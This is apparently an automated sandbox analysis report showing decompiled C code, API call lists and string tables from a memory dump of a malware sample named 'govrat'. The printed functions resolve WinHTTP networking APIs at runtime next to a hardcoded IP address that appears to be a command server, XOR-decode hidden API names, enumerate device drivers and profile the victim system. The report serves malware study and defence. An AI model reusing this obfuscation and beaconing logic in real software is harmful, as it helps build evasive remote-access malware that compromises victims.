					 *((intOrPtr*)(_t179 - 0x24)) = 0x64616548;
					 *((intOrPtr*)(_t179 - 0x20)) = 0x737265;
					_t166 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x30); // executed
					 *(__edi + 0x2c) = _t166;
					 *(_t179 - 0x7c) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x78)) = 0x41707474;
					 *((intOrPtr*)(_t179 - 0x74)) = 0x65526464;
					 *((intOrPtr*)(_t179 - 0x70)) = 0x73657571;
					 *((intOrPtr*)(_t179 - 0x6c)) = 0x61654874;
					 *((intOrPtr*)(_t179 - 0x68)) = 0x73726564;
					 *((char*)(_t179 - 0x64)) = 0;
					_t168 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x7c); // executed
					 *(__edi + 0x30) = _t168;
					if( *__edi == 0 ||  *(__edi + 4) == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 ||  *(__edi + 0x18) == 0 ||  *(__edi + 0x1c) == 0 ||  *(__edi + 0x20) == 0 ||  *(__edi + 0x24) == 0 ||  *(__edi + 0x28) == 0 ||  *(__edi + 0x2c) == 0 || _t168 == 0) {
						goto L14;
					} else {
						_t143 = 1;
					}
				}
				return _t143;
			}

0x00965b63
0x00965b70
0x00965b73
0x00965b7a
0x00965b7d
0x00965b84
0x00965b87
0x00965b8e
0x00965b91
0x00965b98
0x00965b99
0x00965ba0
0x00965ba9
0x00965baa
0x00965bb3
0x00965bc0
0x00965bc2
0x00965bc9
0x00965bce
0x00965ebe
0x00965ebe
0x00965bd4
0x00965be0
0x00965be7
0x00965bee
0x00965bf5
0x00965bfc
0x00965c02
0x00965c05
0x00965c07
0x00965c13
0x00965c1d
0x00965c27
0x00965c31
0x00965c3b
0x00965c45
0x00965c4f
0x00965c59
0x00965c63
0x00965c6d
0x00965c73
0x00965c75
0x00965c7f
0x00965c86
0x00965c8d
0x00965c94
0x00965c9b
0x00965c9e
0x00965ca0
0x00965caa
0x00965cb1
0x00965cb8
0x00965cbf
0x00965cc6
0x00965ccc
0x00965ccf
0x00965cd1
0x00965cdb
0x00965ce2
0x00965ce9
0x00965cf0
0x00965cf7
0x00965cfe
0x00965d04
0x00965d07
0x00965d09
0x00965d13
0x00965d1a
0x00965d21
0x00965d28
0x00965d2e
0x00965d31
0x00965d33
0x00965d3d
0x00965d44
0x00965d4b
0x00965d52
0x00965d54
0x00965d57
0x00965d5e
0x00965d6c
0x00965d73
0x00965d7a
0x00965d80
0x00965d83
0x00965d85
0x00965d8f
0x00965d96
0x00965d9d
0x00965da4
0x00965dab
0x00965db2
0x00965db8
0x00965dba
0x00965dc4
0x00965dcb
0x00965dd2
0x00965dd9
0x00965de0
0x00965de2
0x00965dec
0x00965df3
0x00965dfa
0x00965e01
0x00965e08
0x00965e0e
0x00965e11
0x00965e13
0x00965e1d
0x00965e24
0x00965e2b
0x00965e32
0x00965e39
0x00965e40
0x00965e42
0x00965e4c
0x00965e53
0x00965e5a
0x00965e61
0x00965e68
0x00965e6f
0x00965e76
0x00965e79
0x00965e7b
0x00965e81
0x00000000
0x00965eb9
0x00965ebb
0x00965ebb
0x00965e81
0x00965ec5

APIs

GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 00965C05
GetProcAddress.KERNEL32(?,?), ref: 00965C73
GetProcAddress.KERNEL32(?,?), ref: 00965C9E
GetProcAddress.KERNEL32(?,?), ref: 00965CCF
GetProcAddress.KERNEL32(?,?), ref: 00965D07
GetProcAddress.KERNEL32(?,?), ref: 00965D31
GetProcAddress.KERNEL32(?,?), ref: 00965D52
GetProcAddress.KERNEL32(?,?), ref: 00965D83
GetProcAddress.KERNEL32(?,?), ref: 00965DB8
GetProcAddress.KERNEL32(?,?), ref: 00965DE0
GetProcAddress.KERNEL32(?,?), ref: 00965E11
GetProcAddress.KERNEL32(?,?), ref: 00965E40
GetProcAddress.KERNEL32(?,?), ref: 00965E79

Strings

ddRe, xrefs: 00965E5A
lose, xrefs: 00965DFA
Prox, xrefs: 00965C31
ques, xrefs: 00965E61
penR, xrefs: 00965D6C
WinH, xrefs: 00965C7F
ttpO, xrefs: 00965D5E
figF, xrefs: 00965C45
WinH, xrefs: 00965DC4
etTi, xrefs: 00965CB8
pen, xrefs: 00965D4B
WinH, xrefs: 00965D3D
ecei, xrefs: 00965CE9
ttpS, xrefs: 00965CB1
uery, xrefs: 00965E2B
Head, xrefs: 00965E32
WinH, xrefs: 00965CDB
veRe, xrefs: 00965CF0
yCon, xrefs: 00965C3B
WinH, xrefs: 00965D13
ers, xrefs: 00965E39
orCu, xrefs: 00965C4F
meou, xrefs: 00965CBF
eadD, xrefs: 00965DD2
WinH, xrefs: 00965E1D
WinH, xrefs: 00965D8F
etOp, xrefs: 00965C8D
eque, xrefs: 00965BF5
ttpR, xrefs: 00965DCB
ttpC, xrefs: 00965D1A
192.243.101.124, xrefs: 00965BD4
oxyF, xrefs: 00965DA4
WinH, xrefs: 00965D57
tHea, xrefs: 00965E68
ttpC, xrefs: 00965DF3
spon, xrefs: 00965CF7
ders, xrefs: 00965E6F
orUr, xrefs: 00965DAB
ttpO, xrefs: 00965D44
ttpQ, xrefs: 00965E24
etIE, xrefs: 00965C27
WinH, xrefs: 00965BE0
ttpG, xrefs: 00965C1D
tion, xrefs: 00965C94
eque, xrefs: 00965D73
tUse, xrefs: 00965C63
WinH, xrefs: 00965E4C
etPr, xrefs: 00965D9D
ttpG, xrefs: 00965D96
WinH, xrefs: 00965C13
WinH, xrefs: 00965CAA
Hand, xrefs: 00965E01
ttpA, xrefs: 00965E53
ttpS, xrefs: 00965BE7
WinH, xrefs: 00965DEC
ata, xrefs: 00965DD9
ttpR, xrefs: 00965CE2
onne, xrefs: 00965D21
rren, xrefs: 00965C59
ttpS, xrefs: 00965C86

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00960762, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 101
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00960762(char __ebx, void* __ecx, void* __edx, void* __edi) {
				void* _t51;
				void* _t56;
				void* _t59;
				struct HINSTANCE__* _t61;
				void* _t63;
				void* _t64;
				void* _t65;
				struct HINSTANCE__* _t67;
				_Unknown_base(*)()* _t68;
				void* _t71;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr* _t84;
				CHAR* _t85;
				void* _t88;

				 *((intOrPtr*)(_t88 - 5)) = 0x65391617;
				 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
				 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
				 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
				 *((short*)(_t88 - 0x13)) = 0x1c16;
				 *((char*)(_t88 - 0x14)) = 0x39;
				 *((char*)(_t88 - 1)) = __ebx;
				_t51 = 0;
				do {
					 *(_t88 + _t51 - 0x14) =  *(_t88 + _t51 - 0x14) ^ 0x00000065;
					_t51 = _t51 + 1;
				} while (_t51 < 0x13);
				_pop(_t84);
				L009BFF8A(_t51, __ebx, __ecx, __edi, _t84);
				 *((char*)(_t88 - 1)) = 1;
				 *_t84(_t88 - 0x130, _t88 - 0x14);
				 *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15;
				 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
				 *((short*)(_t88 - 0x21)) = 0x1007;
				 *((char*)(_t88 - 0x17)) = __ebx;
				_t56 = 0;
				do {
					 *(_t88 + _t56 - 0x21) =  *(_t88 + _t56 - 0x21) ^ 0x00000066;
					_t56 = _t56 + 1;
				} while (_t56 < 0xa);
				 *((char*)(_t88 - 0x17)) = 1;
				_t59 =  *_t84(_t88 - 0x130, _t88 - 0x21);
				_pop(_t82);
				L0097F5E8(_t59, __ebx, __edx, _t82);
				_t85 = "kernel32";
				_t61 =  *_t82(_t85);
				if(_t61 == __ebx) {
					_push(_t85);
					return L009E886A(_t61, _t82);
				}
				GetProcAddress(_t61, "FindFirstFileA"); // executed
				_t78 = _t88 - 0x130;
				_t63 = FindFirstFileA(_t78, _t88 - 0x270); // executed
				 *(_t88 - 0x28) = _t63;
				if(_t63 != 0xffffffff) {
					 *((intOrPtr*)(_t88 - 5)) = 0x7510061a;
					 *((intOrPtr*)(_t88 - 9)) = 0x1936111b;
					 *(_t88 - 0xb) = 0x1c33;
					 *((char*)(_t88 - 1)) = __ebx;
					_t64 = 0;
					do {
						 *(_t88 + _t64 - 0xb) =  *(_t88 + _t64 - 0xb) ^ 0x00000075;
						_t64 = _t64 + 1;
					} while (_t64 < 0xa);
					 *((char*)(_t88 - 1)) = 1;
					 *((intOrPtr*)(_t88 - 0x1b)) = 0x75474619;
					 *((intOrPtr*)(_t88 - 0x1f)) = 0x101b0710;
					 *((char*)(_t88 - 0x20)) = 0x1e;
					 *((char*)(_t88 - 0x17)) = __ebx;
					_t65 = 0;
					do {
						 *(_t88 + _t65 - 0x20) =  *(_t88 + _t65 - 0x20) ^ 0x00000075;
						_t65 = _t65 + 1;
					} while (_t65 < 9);
					 *((char*)(_t88 - 0x17)) = 1;
					_t67 =  *_t82(_t88 - 0x20);
					if(_t67 == __ebx) {
						_push(_t88 - 0x20);
						_push(_t78);
						_t67 = L009A502A(_t88 - 0x20, _t82);
					}
					_t68 = GetProcAddress(_t67, _t88 - 0xb);
					 *_t68( *(_t88 - 0x28));
					_t71 = 1;
				} else {
					_t71 = 0;
				}
				return _t71;
			}

0x00960762
0x00960769
0x00960770
0x00960777
0x0096077e
0x00960784
0x00960788
0x0096078b
0x0096078d
0x0096078d
0x00960792
0x00960793
0x00960798
0x00960799
0x009607a9
0x009607ad
0x009607af
0x009607b6
0x009607bd
0x009607c3
0x009607c6
0x009607c8
0x009607c8
0x009607cd
0x009607ce
0x009607de
0x009607e2
0x009607e4
0x009607e5
0x009607ea
0x009607f0
0x009607f4
0x009607f6
0x00000000
0x009607f7
0x00960809
0x00960812
0x00960819
0x0096081b
0x00960821
0x00960827
0x0096082e
0x00960835
0x0096083b
0x0096083e
0x00960840
0x00960840
0x00960845
0x00960846
0x0096084b
0x0096084f
0x00960856
0x0096085d
0x00960861
0x00960864
0x00960866
0x00960866
0x0096086b
0x0096086c
0x00960875
0x00960879
0x0096087d
0x00960882
0x00960883
0x00960884
0x00960884
0x0096088e
0x00960893
0x00960897
0x00960823
0x00960823
0x00960823
0x0096089c

APIs

GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 00960809
FindFirstFileA.KERNELBASE(?,?), ref: 00960819
GetProcAddress.KERNEL32(00000000,00000075), ref: 0096088E

Strings

f, xrefs: 009607C8
u, xrefs: 00960866
kernel32, xrefs: 009607EA, 009607EF, 009607F6
u, xrefs: 00960840
e, xrefs: 0096078D
FindFirstFileA, xrefs: 00960803

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095FE2E, Relevance: 9.1, APIs: 6, Instructions: 99
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0095FE2E(struct HINSTANCE__* __eax, signed int __ebx) {
				void* _t45;
				_Unknown_base(*)()* _t47;
				void* _t48;
				_Unknown_base(*)()* _t50;
				void* _t51;
				void* _t62;
				signed int _t65;
				void* _t67;
				void* _t71;
				struct HINSTANCE__* _t72;
				void* _t74;
				void* _t79;

				_t65 = __ebx;
				_t72 = __eax;
				 *((intOrPtr*)(_t79 - 0x11)) = 0xf2818097;
				 *((intOrPtr*)(_t79 - 0x15)) = 0x849b80b6;
				 *((intOrPtr*)(_t79 - 0x19)) = 0x97919b84;
				 *((intOrPtr*)(_t79 - 0x1d)) = 0x97b69f87;
				 *(_t79 - 0x1f) = 0x9cb7;
				 *((char*)(_t79 - 0xd)) = __ebx;
				_t45 = 0;
				do {
					 *(_t79 + _t45 - 0x1f) =  *(_t79 + _t45 - 0x1f) ^ 0x000000f2;
					_t45 = _t45 + 1;
				} while (_t45 < 0x12);
				 *((char*)(_t79 - 0xd)) = 1;
				_t47 = GetProcAddress(__eax, _t79 - 0x1f); // executed
				 *(_t79 - 0x40) = _t47;
				 *((intOrPtr*)(_t79 - 0x24)) = 0xf3a4969e;
				 *((intOrPtr*)(_t79 - 0x28)) = 0x92bd9680;
				 *((intOrPtr*)(_t79 - 0x2c)) = 0x92b18196;
				 *((intOrPtr*)(_t79 - 0x30)) = 0x859a81b7;
				 *((intOrPtr*)(_t79 - 0x34)) = 0x96909a85;
				 *((intOrPtr*)(_t79 - 0x38)) = 0x96b78796;
				 *(_t79 - 0x39) = 0xb4;
				 *((char*)(_t79 - 0x20)) = __ebx;
				_t48 = 0;
				do {
					 *(_t79 + _t48 - 0x39) =  *(_t79 + _t48 - 0x39) ^ 0x000000f3;
					_t48 = _t48 + 1;
				} while (_t48 < 0x19);
				 *((char*)(_t79 - 0x20)) = 1;
				_t50 = GetProcAddress(_t72, _t79 - 0x39); // executed
				 *(_t79 - 8) = _t50;
				if( *(_t79 - 0x40) == __ebx || _t50 == __ebx) {
					L14:
					_t51 = 0;
				} else {
					 *(_t79 - 0x40)(_t79 - 0x44, 4, _t79 - 0xc);
					_t77 =  *(_t79 - 0xc);
					_t88 =  *(_t79 - 0xc) - __ebx;
					if( *(_t79 - 0xc) == __ebx) {
						goto L14;
					} else {
						_t74 = E0095C795(_t71, _t77, _t88);
						if(_t74 == __ebx) {
							goto L14;
						} else {
							_push(_t79 - 0x44);
							_push( *(_t79 - 0xc));
							_push(_t74); // executed
							if( *(_t79 - 0x40)() == 0) {
								L13:
								E0095115B(_t67, _t71, _t77, _t74);
								goto L14;
							} else {
								_t77 =  *(_t79 - 0xc) >> 2;
								if(_t77 > __ebx) {
									do {
										_push(0x400);
										_push(_t79 - 0x844);
										_push( *((intOrPtr*)(_t74 + _t65 * 4)));
										if( *(_t79 - 8)() == 0) {
											goto L12;
										} else {
											_t62 = L00951C05(_t79 - 0x844,  *((intOrPtr*)(_t79 + 8)));
											_pop(_t67);
											if(_t62 == 0) {
												E0095115B(_t67, _t71, _t77, _t74);
												_t51 = 1;
											} else {
												goto L12;
											}
										}
										goto L15;
										L12:
										_t65 = _t65 + 1;
									} while (_t65 < _t77);
								}
								goto L13;
							}
						}
					}
				}
				L15:
				return _t51;
			}

0x0095fe2e
0x0095fe2e
0x0095fe30
0x0095fe37
0x0095fe3e
0x0095fe45
0x0095fe4c
0x0095fe52
0x0095fe55
0x0095fe57
0x0095fe57
0x0095fe5c
0x0095fe5d
0x0095fe6d
0x0095fe71
0x0095fe73
0x0095fe76
0x0095fe7d
0x0095fe84
0x0095fe8b
0x0095fe92
0x0095fe99
0x0095fea0
0x0095fea4
0x0095fea7
0x0095fea9
0x0095fea9
0x0095feae
0x0095feaf
0x0095feb9
0x0095febd
0x0095febf
0x0095fec5
0x0095ff3a
0x0095ff3a
0x0095fecb
0x0095fed5
0x0095fed8
0x0095fedb
0x0095fedd
0x00000000
0x0095fedf
0x0095fee4
0x0095fee8
0x00000000
0x0095feea
0x0095feed
0x0095feee
0x0095fef1
0x0095fef7
0x0095ff33
0x0095ff34
0x00000000
0x0095fef9
0x0095fefc
0x0095ff01
0x0095ff03
0x0095ff03
0x0095ff0e
0x0095ff0f
0x0095ff17
0x00000000
0x0095ff19
0x0095ff23
0x0095ff29
0x0095ff2c
0x0095ff42
0x0095ff4a
0x00000000
0x00000000
0x00000000
0x0095ff2c
0x00000000
0x0095ff2e
0x0095ff2e
0x0095ff2f
0x0095ff03
0x00000000
0x0095ff01
0x0095fef7
0x0095fee8
0x0095fedd
0x0095ff3c
0x0095ff40

APIs

GetProcAddress.KERNEL32(?,000000F2), ref: 0095FE71
GetProcAddress.KERNEL32(?,000000F3), ref: 0095FEBD
K32EnumDeviceDrivers.KERNEL32(?,00000004,?,?,000000F3), ref: 0095FED5
K32EnumDeviceDrivers.KERNEL32(00000000,?,?,?,000000F3), ref: 0095FEF2
K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400,?,000000F3), ref: 0095FF12
__wcsicoll.LIBCMT ref: 0095FF23

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009641C3, Relevance: 3.9, APIs: 2, Instructions: 898
libraryCrypto

C-Code - Quality: 89%

			E009641C3(struct HINSTANCE__* __eax, signed short* __edx, void* __edi) {
				void* __esi;
				int _t494;
				signed short* _t496;
				void* _t499;
				char* _t501;
				void* _t502;
				signed short _t504;
				short _t505;
				short _t506;
				short _t507;
				short _t508;
				short _t509;
				short _t510;
				short _t511;
				signed short* _t520;
				signed short* _t521;
				signed short _t522;
				signed short* _t523;
				signed short* _t524;
				intOrPtr _t525;
				void* _t532;
				intOrPtr* _t535;
				void* _t538;
				intOrPtr* _t540;
				intOrPtr* _t541;
				signed short* _t545;
				signed short* _t548;
				signed short* _t551;
				signed short* _t554;
				signed short* _t557;
				signed short* _t773;
				void* _t780;
				void* _t782;
				void* _t783;
				short _t785;
				short _t786;
				short _t787;
				short _t788;
				short _t789;
				short _t790;
				short _t791;
				short _t794;
				short _t795;
				short _t796;
				short _t797;
				short _t798;
				short _t799;
				short _t800;
				short _t803;
				short _t804;
				short _t805;
				short _t806;
				short _t807;
				short _t808;
				short _t809;
				signed int _t821;
				signed short* _t822;
				intOrPtr _t823;
				intOrPtr* _t826;
				signed int _t828;
				void* _t830;
				void* _t831;
				signed short _t833;
				signed short _t834;
				signed int _t838;
				signed short* _t839;
				signed int _t849;
				signed int _t850;
				void* _t851;
				void* _t852;
				signed short _t853;
				signed short* _t854;
				void* _t855;
				signed short* _t856;
				signed short* _t879;
				intOrPtr* _t880;
				intOrPtr _t881;
				WCHAR* _t883;
				signed short* _t884;
				signed short* _t886;
				signed short* _t888;
				void* _t889;

				_t855 = __edi;
				_t839 = __edx;
				GetProcAddress(__eax, ??); // executed
				_t776 = _t889 - 0x480;
				_t494 = GetDiskFreeSpaceExW(_t883, _t889 - 0x480, _t889 - 0x478, 0); // executed
				if(_t494 == 0) {
					 *(__edi + 0x55c) = 0;
					 *(__edi + 0x558) = 0;
				} else {
					 *(__edi + 0x558) = ( *(_t889 - 0x474) << 0x00000020 |  *(_t889 - 0x478)) >> 0x14;
					_t838 =  *(_t889 - 0x47c);
					_t776 = _t838 >> 0x14;
					 *(__edi + 0x55c) = (_t838 << 0x00000020 |  *(_t889 - 0x480)) >> 0x14;
				}
				E0095115B(_t776, _t839, _t883, _t883);
				_t496 = E0095D461(0, _t855, _t883, 0); // executed
				_t856 = _t496;
				_push(_t889 - 0x90);
				_t884 = _t889 - 0x46c;
				 *(_t889 - 0x9c) = _t856;
				 *(_t889 - 0x18) = 0;
				L0095D1A8(); // executed
				if( *(_t889 - 0x46c) != 0) {
					_t557 = E0095D461(0, _t856, _t884, 1); // executed
					 *(_t889 - 0x18) = _t557;
				}
				if(_t856 == 0) {
					_t780 = 0;
				} else {
					_t554 = _t856;
					_t25 =  &(_t554[1]); // 0x2
					_t839 = _t25;
					do {
						_t834 =  *_t554;
						_t554 =  &(_t554[1]);
					} while (_t834 != 0);
					_t780 = (_t554 - _t839 >> 1) + (_t554 - _t839 >> 1);
				}
				if( *(_t889 - 0x18) == 0) {
					_t499 = 0;
				} else {
					_t551 =  *(_t889 - 0x18);
					_t884 =  &(_t551[1]);
					do {
						_t839 =  *_t551;
						_t551 =  &(_t551[1]);
					} while (_t839 != 0);
					_t499 = (_t551 - _t884 >> 1) + (_t551 - _t884 >> 1);
				}
				_t501 = E00951195(_t839, _t856, _t884, _t499 + _t780 + 0x960);
				 *((intOrPtr*)(_t889 - 0x470)) = _t501;
				_t782 = 0x400;
				do {
					 *_t501 = 0;
					_t501 = _t501 + 1;
					_t782 = _t782 - 1;
				} while (_t782 != 0);
				if(_t856 == 0) {
					_t783 = 0;
				} else {
					_t548 = _t856;
					_t33 =  &(_t548[1]); // 0x2
					_t854 = _t33;
					do {
						_t833 =  *_t548;
						_t548 =  &(_t548[1]);
					} while (_t833 != 0);
					_t783 = (_t548 - _t854 >> 1) + (_t548 - _t854 >> 1);
				}
				if( *(_t889 - 0x18) == 0) {
					_t502 = 0;
				} else {
					_t545 =  *(_t889 - 0x18);
					_t888 =  &(_t545[1]);
					do {
						_t853 =  *_t545;
						_t545 =  &(_t545[1]);
					} while (_t853 != 0);
					_t502 = (_t545 - _t888 >> 1) + (_t545 - _t888 >> 1);
				}
				 *((intOrPtr*)(_t889 - 0x464)) = _t502 + _t783 + 0x960;
				_t504 = 0x20;
				 *((short*)(_t889 - 0xbc)) = _t504;
				_t785 = 0x28;
				 *((short*)(_t889 - 0xba)) = _t785;
				_t786 = 0x36;
				 *((short*)(_t889 - 0xb8)) = _t786;
				_t787 = 0x34;
				 *((short*)(_t889 - 0xb6)) = _t787;
				_t788 = 0x62;
				 *((short*)(_t889 - 0xb4)) = _t788;
				_t789 = 0x69;
				 *((short*)(_t889 - 0xb2)) = _t789;
				_t790 = 0x74;
				 *((short*)(_t889 - 0xb0)) = _t790;
				_t791 = 0x29;
				 *((short*)(_t889 - 0xae)) = _t791;
				 *((short*)(_t889 - 0xac)) = 0;
				 *((short*)(_t889 - 0xd0)) = _t504;
				_t794 = 0x28;
				 *((short*)(_t889 - 0xce)) = _t794;
				_t795 = 0x33;
				 *((short*)(_t889 - 0xcc)) = _t795;
				_t796 = 0x32;
				 *((short*)(_t889 - 0xca)) = _t796;
				_t797 = 0x62;
				 *((short*)(_t889 - 0xc8)) = _t797;
				_t798 = 0x69;
				 *((short*)(_t889 - 0xc6)) = _t798;
				_t799 = 0x74;
				 *((short*)(_t889 - 0xc4)) = _t799;
				_t800 = 0x29;
				 *((short*)(_t889 - 0xc2)) = _t800;
				 *((short*)(_t889 - 0xc0)) = 0;
				 *(_t889 - 0x128) = _t504;
				_t803 = 0x5b;
				 *((short*)(_t889 - 0x126)) = _t803;
				_t804 = 0x47;
				 *((short*)(_t889 - 0x124)) = _t804;
				_t805 = 0x55;
				 *((short*)(_t889 - 0x122)) = _t805;
				_t806 = 0x45;
				 *((short*)(_t889 - 0x120)) = _t806;
				_t807 = 0x53;
				 *((short*)(_t889 - 0x11e)) = _t807;
				_t808 = 0x54;
				 *((short*)(_t889 - 0x11c)) = _t808;
				_t809 = 0x5d;
				 *((short*)(_t889 - 0x11a)) = _t809;
				 *((short*)(_t889 - 0x118)) = 0;
				 *(_t889 - 0x114) = _t504;
				_t505 = 0x5b;
				 *((short*)(_t889 - 0x112)) = _t505;
				_t506 = 0x41;
				 *((short*)(_t889 - 0x110)) = _t506;
				_t507 = 0x44;
				 *((short*)(_t889 - 0x10e)) = _t507;
				_t508 = 0x4d;
				 *((short*)(_t889 - 0x10c)) = _t508;
				_t509 = 0x49;
				 *((short*)(_t889 - 0x10a)) = _t509;
				_t510 = 0x4e;
				 *((short*)(_t889 - 0x108)) = _t510;
				_t511 = 0x5d;
				 *((short*)(_t889 - 0x106)) = _t511;
				 *((short*)(_t889 - 0x104)) = 0;
				 *((short*)(_t889 - 0xf2)) = 0xdb;
				 *((short*)(_t889 - 0xf4)) = 0xdb;
				 *((short*)(_t889 - 0xf6)) = 0x8c;
				 *((short*)(_t889 - 0xf8)) = 0x94;
				 *((short*)(_t889 - 0xfa)) = 0xdb;
				 *((short*)(_t889 - 0xfc)) = 0x90;
				 *((short*)(_t889 - 0xfe)) = 0xdb;
				 *((short*)(_t889 - 0x100)) = 0x8e;
				 *((short*)(_t889 - 0x258)) = 0xe6;
				 *((short*)(_t889 - 0x25a)) = 0xdb;
				 *((short*)(_t889 - 0x25c)) = 0xc3;
				 *((short*)(_t889 - 0x25e)) = 0xec;
				 *((short*)(_t889 - 0x260)) = 0xdc;
				 *((short*)(_t889 - 0x262)) = 0xcf;
				 *((short*)(_t889 - 0x264)) = 0xd2;
				 *((short*)(_t889 - 0x266)) = 0xd0;
				 *((short*)(_t889 - 0x268)) = 0x9e;
				 *((short*)(_t889 - 0x26a)) = 0xce;
				 *((short*)(_t889 - 0x26c)) = 0xc6;
				 *((short*)(_t889 - 0x26e)) = 0x92;
				 *((char*)(_t889 - 0xf0)) = 0;
				 *((short*)(_t889 - 0x270)) = 0xdb;
				 *((short*)(_t889 - 0x272)) = 0x8f;
				 *((short*)(_t889 - 0x274)) = 0xaa;
				 *((short*)(_t889 - 0x276)) = 0x88;
				 *((short*)(_t889 - 0x278)) = 0x89;
				 *((short*)(_t889 - 0x27a)) = 0x8f;
				 *((short*)(_t889 - 0x27c)) = 0x92;
				 *((short*)(_t889 - 0x27e)) = 0x87;
				 *((short*)(_t889 - 0x280)) = 0x85;
				 *((short*)(_t889 - 0x282)) = 0x8f;
				 *((short*)(_t889 - 0x284)) = 0x8a;
				 *((short*)(_t889 - 0x286)) = 0x96;
				 *((short*)(_t889 - 0x288)) = 0x96;
				 *((short*)(_t889 - 0x28a)) = 0xa7;
				 *((short*)(_t889 - 0x28c)) = 0xec;
				 *((short*)(_t889 - 0x28e)) = 0xdb;
				 *((short*)(_t889 - 0x290)) = 0xc3;
				 *((short*)(_t889 - 0x292)) = 0xec;
				 *((short*)(_t889 - 0x294)) = 0xdc;
				 *((short*)(_t889 - 0x296)) = 0xcf;
				 *((short*)(_t889 - 0x298)) = 0xd0;
				 *((short*)(_t889 - 0x29a)) = 0xde;
				 *((short*)(_t889 - 0x29c)) = 0x9e;
				 *((short*)(_t889 - 0x29e)) = 0xce;
				 *((short*)(_t889 - 0x2a0)) = 0xc6;
				 *((short*)(_t889 - 0x2a2)) = 0x92;
				 *((short*)(_t889 - 0x2a4)) = 0xdb;
				 *((short*)(_t889 - 0x2a6)) = 0x8f;
				 *((short*)(_t889 - 0x2a8)) = 0xaa;
				 *((short*)(_t889 - 0x2aa)) = 0xc6;
				 *((short*)(_t889 - 0x2ac)) = 0x88;
				 *((short*)(_t889 - 0x2ae)) = 0x89;
				 *((short*)(_t889 - 0x2b0)) = 0x8f;
				 *((short*)(_t889 - 0x2ba)) = 0x8a;
				 *((short*)(_t889 - 0x2b2)) = 0x92;
				 *((short*)(_t889 - 0x2be)) = 0x96;
				 *((short*)(_t889 - 0x2b4)) = 0x87;
				 *((short*)(_t889 - 0x2c0)) = 0xa7;
				 *((short*)(_t889 - 0x2c2)) = 0xec;
				 *((short*)(_t889 - 0x2c4)) = 0xdb;
				 *((short*)(_t889 - 0x2c6)) = 0xc3;
				 *((short*)(_t889 - 0x2c8)) = 0xc6;
				 *((short*)(_t889 - 0x2ca)) = 0xdc;
				 *((short*)(_t889 - 0x2cc)) = 0xa2;
				 *((short*)(_t889 - 0x2bc)) = 0x96;
				 *((short*)(_t889 - 0x2ce)) = 0xaf;
				 *((intOrPtr*)(_t889 - 0x2b8)) = 0x85008f;
				 *((short*)(_t889 - 0x2d0)) = 0xb5;
				 *((short*)(_t889 - 0x2d2)) = 0xec;
				 *((short*)(_t889 - 0x2d4)) = 0xdb;
				 *((short*)(_t889 - 0x2d6)) = 0xc3;
				 *((short*)(_t889 - 0x2d8)) = 0xdb;
				 *((short*)(_t889 - 0x2da)) = 0xc3;
				 *((short*)(_t889 - 0x2dc)) = 0xdb;
				 *((short*)(_t889 - 0x2de)) = 0xc3;
				 *((short*)(_t889 - 0x2e0)) = 0xdb;
				 *((short*)(_t889 - 0x2e2)) = 0xc3;
				 *((short*)(_t889 - 0x2e4)) = 0xdb;
				 *((short*)(_t889 - 0x2e6)) = 0xc3;
				 *((short*)(_t889 - 0x2e8)) = 0xc6;
				 *((short*)(_t889 - 0x2ea)) = 0xdc;
				 *((short*)(_t889 - 0x2ec)) = 0x89;
				 *((short*)(_t889 - 0x2f4)) = 0xc6;
				 *((short*)(_t889 - 0x2ee)) = 0x80;
				 *((short*)(_t889 - 0x2f6)) = 0x94;
				 *((short*)(_t889 - 0x2f8)) = 0x83;
				 *((short*)(_t889 - 0x2fa)) = 0xdb;
				 *((short*)(_t889 - 0x2fc)) = 0xb3;
				 *((short*)(_t889 - 0x2fe)) = 0xec;
				 *((short*)(_t889 - 0x300)) = 0xec;
				 *((short*)(_t889 - 0x302)) = 0xcf;
				 *((short*)(_t889 - 0x304)) = 0xdb;
				 *((short*)(_t889 - 0x306)) = 0xc3;
				 *((short*)(_t889 - 0x308)) = 0xce;
				 *((short*)(_t889 - 0x30a)) = 0xc6;
				 *((short*)(_t889 - 0x30c)) = 0xdb;
